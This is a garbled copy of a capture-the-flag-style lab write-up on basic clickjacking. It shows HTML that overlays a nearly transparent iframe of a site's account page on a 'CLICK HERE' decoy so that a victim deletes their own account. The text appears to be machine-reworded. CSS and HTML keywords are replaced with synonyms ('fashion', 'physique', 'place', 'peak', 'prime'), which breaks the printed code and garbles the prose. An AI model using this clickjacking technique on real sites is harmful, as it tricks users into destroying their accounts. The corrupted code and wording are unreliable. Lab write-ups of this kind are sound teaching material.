On this apprentice stage lab, we are going to exploit the delete account stream from an internet site susceptible to clickjacking despite the fact that there may be some CSRF token safety current.
Upon logging in with the given credentials, we discover that after going to the Account’s web page, all that’s wanted to delete a person account is click on on the Delete Account
button. Let’s use the writing materials’s clickjacking template to craft our exploit:
<head>
<fashion>
iframe {
place:relative;
width:700px;
peak:600px;
opacity:0.1;
z-index:2;
}
div {
place:absolute;
z-index:1;
}
</fashion>
</head>
<physique>
<div>
CLICK HERE
</div>
<iframe src="${LAB_ACCOUNT_ROUTE_URL}">
</iframe>
</physique>
That is how the template appears on our exploit server:
We have to modify the situation of the CLICK ME
div tag in order that it’s on prime of the Delete Account
button on the susceptible web site. Notice that we’re setting the iframe’s opacity to 0.1
to have the ability to examine the exploit look after which modifying the div’s prime and left CSS properties in order that when a logged in person clicks on the CLICK ME
div on our web site, they’re truly clicking on the susceptible web site’s button to delete their account. After setting the highest property to 500px and the left property to 50px, it appears just like the buttons are aligned to carry out a profitable assault. At this level, our exploit appears like this:
<head>
<fashion>
iframe {
place:relative;
width:700px;
peak:600px;
opacity:0.1;
z-index:2;
}
div {
place:absolute;
z-index:1;
prime:500px;
left:50px;
}
</fashion>
</head>
<physique>
<div>
CLICK HERE
</div>
<iframe src="${LAB_ACCOUNT_ROUTE_URL}">
</iframe>
</physique>
All we have to do is ready the iframe’s opacity to 0.00001 or one thing comparable in order that it’s virtually invisible and ship the exploit to our sufferer.
Take a look at this write up on the Artwork Of Code: https://artofcode.tech/portswiggers-lab-write-up-basic-clickjacking-with-csrf-token-protection/